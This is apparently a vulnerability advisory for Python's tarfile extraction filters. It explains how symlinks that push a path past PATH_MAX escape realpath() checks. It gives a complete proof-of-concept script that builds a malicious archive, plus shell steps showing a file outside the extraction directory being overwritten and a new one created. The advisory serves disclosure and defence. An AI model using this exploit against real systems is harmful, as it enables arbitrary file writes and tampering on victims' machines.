Summary
Python's TarFile.extractall() and TarFile.extract() methods accept a filter that is intended to make extraction safer. Python's standard library provides two implementations, tar_filter ("tar") and data_filter ("data"), each applying a different set of checks to improve the safety of tarfile extraction.
A bug exists when a path containing symlinks is shorter than PATH_MAX as written, but longer than PATH_MAX once the symlinks are substituted by os.path.realpath(). Any symlinks that fall beyond PATH_MAX are not expanded.
The "tar" and "data" filters use os.path.realpath() to validate the path, but no error is raised if PATH_MAX is exceeded. Later, during extractall() or extract(), the paths are used without being passed through os.path.realpath().
This bug allows for arbitrary file reads and writes outside of the destination path. It has been tested successfully on Linux and OSX.
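The kind of check described above can be sketched as follows. This is a simplified illustration, not the standard library's code: the helper name resolves_inside is hypothetical, and the sketch only shows the general shape of a realpath-based containment test. Such a test is only as reliable as the resolved path it is given, so if resolution silently stops partway through, the comparison is made against a path that the filesystem will not actually follow.

```python
import os
import tempfile


def resolves_inside(dest, member_name):
    """Return True if member_name, joined onto dest, resolves inside dest.

    Hypothetical helper for illustration; not the stdlib implementation.
    """
    dest_real = os.path.realpath(dest)
    # Non-strict realpath(): a component that cannot be examined is kept
    # as written instead of raising, which is the behavior the bug relies on.
    target_real = os.path.realpath(os.path.join(dest_real, member_name))
    return os.path.commonpath([target_real, dest_real]) == dest_real


dest = tempfile.mkdtemp()
print(resolves_inside(dest, "docs/readme.txt"))  # stays under dest
print(resolves_inside(dest, "../outside.txt"))   # climbs out of dest
```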
Severity
Critical - Anyone using TarFile.extractall() or TarFile.extract() with filter="data" or filter="tar", directly or indirectly, must patch immediately or introduce other mitigating controls.
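As one example of a mitigating control, an application that never needs links in the archives it handles could refuse them outright before extracting. The sketch below is a stopgap under that assumption, not the upstream fix. The helper name reject_link_members is hypothetical. It also assumes the destination directory does not already contain attacker-controlled symlinks, and that the archive is seekable so that getmembers() can scan it before extraction.

```python
import io
import tarfile


def reject_link_members(tar):
    """Return the member list, raising ValueError if any member is a link.

    Hypothetical helper: rejects both symlinks and hardlinks, since the
    technique in this advisory depends on link members inside the archive.
    """
    members = tar.getmembers()
    for member in members:
        if member.issym() or member.islnk():
            raise ValueError(f"refusing link member: {member.name!r}")
    return members


# Possible usage (paths are placeholders):
# with tarfile.open("upload.tar") as tar:
#     members = reject_link_members(tar)
#     tar.extractall("dest", members=members, filter="data")
```

This trades functionality for safety: archives that legitimately contain symlinks or hardlinks are rejected as well.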
Proof of Concept
This proof-of-concept assumes it is being run under /home/username.
The tar file created in this PoC will modify the /home/username/flag/flag file, which exists outside of the destination path the tar file is extracted into. The tar file will also create /home/username/flag/newfile.
The PoC has been successfully run in Python 3.12.3 and Python 3.13.3 on Linux and Python 3.13.0 on OSX.
- Prepare the environment
$ pwd
/home/username
$ mkdir flag
$ echo "hello world" > flag/flag
- Prepare the tar file
Open a Python interpreter and run the following code (it can be copied and pasted).
import tarfile
import os
import io
import sys

# 247 (55 on OSX) picked so the expanded path of dirs is 3968 bytes long (or 896
# on OSX), leaving 128 bytes for a prefix and at least a few chars of the link
comp = 'd' * (55 if sys.platform == 'darwin' else 247)
steps = "abcdefghijklmnop"
path = ""

with tarfile.open("poc.tar", mode="x") as tar:
    # populate the symlinks and dirs that expand in os.path.realpath()
    for i in steps:
        a = tarfile.TarInfo(os.path.join(path, comp))
        a.type = tarfile.DIRTYPE
        tar.addfile(a)
        b = tarfile.TarInfo(os.path.join(path, i))
        b.type = tarfile.SYMTYPE
        b.linkname = comp
        tar.addfile(b)
        path = os.path.join(path, comp)
    # create the final symlink that exceeds PATH_MAX and simply points to the
    # top dir. this allows *any* path to be appended.
    # this link will never be expanded by os.path.realpath(), nor anything after it.
    linkpath = os.path.join("/".join(steps), "l"*254)
    l = tarfile.TarInfo(linkpath)
    l.type = tarfile.SYMTYPE
    l.linkname = ("../" * len(steps))
    tar.addfile(l)
    # make a symlink outside to keep the tar command happy
    e = tarfile.TarInfo("escape")
    e.type = tarfile.SYMTYPE
    e.linkname = linkpath + "/../flag"
    tar.addfile(e)
    # use the symlinks above, that are not checked, to create a hardlink
    # to a file outside of the destination path
    f = tarfile.TarInfo("flaglink")
    f.type = tarfile.LNKTYPE
    f.linkname = "escape/flag"
    tar.addfile(f)
    # now that we have the hardlink we can overwrite the file
    content = b"overwrite\n"
    c = tarfile.TarInfo("flaglink")
    c.type = tarfile.REGTYPE
    c.size = len(content)
    tar.addfile(c, fileobj=io.BytesIO(content))
    # we can also create new files as well!
    content = b"new!\n"
    n = tarfile.TarInfo("escape/newfile")
    n.type = tarfile.REGTYPE
    n.size = len(content)
    tar.addfile(n, fileobj=io.BytesIO(content))
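The length arithmetic behind the component sizes in the script can be checked with a short sketch. The helper names below are hypothetical, and the PATH_MAX values of 4096 (Linux) and 1024 (OSX) are the usual platform constants, assumed here because they match the "128 bytes" remainder stated in the script's comment.

```python
STEPS = 16  # len("abcdefghijklmnop")


def expanded_length(component_len, steps=STEPS):
    """Length of the path once every one-letter symlink is replaced by its
    target: each level contributes one directory name plus one "/"."""
    return steps * (component_len + 1)


def unexpanded_length(steps=STEPS, final_link_len=254):
    """Length of the path as written in the archive: "a/b/.../p" followed by
    "/" and the final link name."""
    return steps + (steps - 1) + 1 + final_link_len


for platform, comp_len, path_max in (("linux", 247, 4096), ("darwin", 55, 1024)):
    expanded = expanded_length(comp_len)
    print(platform, expanded, path_max - expanded, unexpanded_length())
# linux 3968 128 286
# darwin 896 128 286
```

The written path is only 286 bytes, well under PATH_MAX, while the expanded directory chain alone leaves 128 bytes of headroom, so the 254-character final link pushes the expanded form past the limit.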
- Extract the tarfile
$ pwd
/home/username
$ ls flag # check the flag dir and file are unchanged
flag
$ cat flag/flag
hello world
$ mkdir test # this is where the tar is extracted
$ mkdir otherdir # this is a dummy dir to keep everything clean
$ cd otherdir
$ python3
Python 3.12.3 (main, Apr 10 2024, 05:33:47) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> c
>>>
CTRL-D
$ cd ..
$ ls flag # the flag dir is different!
flag newfile
$ cat flag/flag
overwrite
$ cat flag/newfile
new!
Timeline
Date reported: 04/30/2025
Date fixed:
Date disclosed: 07/20/2025